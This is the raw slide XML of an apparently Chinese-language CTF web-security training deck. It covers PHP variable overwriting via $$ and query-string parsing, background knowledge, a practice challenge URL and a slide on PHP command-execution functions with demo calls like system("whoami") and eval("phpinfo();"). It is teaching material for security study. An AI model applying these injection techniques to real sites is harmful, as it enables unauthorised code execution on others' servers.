              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>query string)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" sz="2200">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2200">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>则将它解析为变量并设置到当前作用域</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{230CF0E7-24BA-5A4C-9188-D3B55BDEF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170" y="2985496"/>
            <a:ext cx="9355146" cy="3152500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25702771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变量覆盖</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489558"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>$$</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2200">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>会把</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2200">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>变量本身的 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>key </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2200">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>当</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2200">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>做名字，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2200" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2200">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>当做变量值</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBEC49B3-FEDA-DA43-9E9D-C67AFDA97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670" y="1665135"/>
            <a:ext cx="8269562" cy="5192865"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="262052309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所需知识</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15B8DEB5-0F52-604C-8E06-F44E4891C047}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640080" y="1066801"/>
            <a:ext cx="9677400" cy="3894143"/>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语言：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Javascript ……</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据库：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MSSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>……</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务器：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Apache</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Nginx</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Tomcat</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>……</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>框架：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>THINKPHP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Flask</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Django</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Spring</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>……</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语言特性（弱类型、截断</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>函数特性（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> is_numeric </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> strcmp</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>eregi…</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="345561712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练习</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489558"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2200" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://ctf5.shiyanbar.com/10/web1/</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="361890160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命令执行</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489558"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2200" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2200" b="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中执行系统命令的函数</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4995ED8-A750-1C4A-85FE-60C61ADA513F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1752600"/>
            <a:ext cx="9403080" cy="4542334"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" b="1" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>system:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="448C27"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" b="1" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eval:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="448C27"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>phpinfo();</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" b="1" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>assert:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>assert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="448C27"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>phpinfo()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2800" b="1" dirty="0">
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" b="1" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exec:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
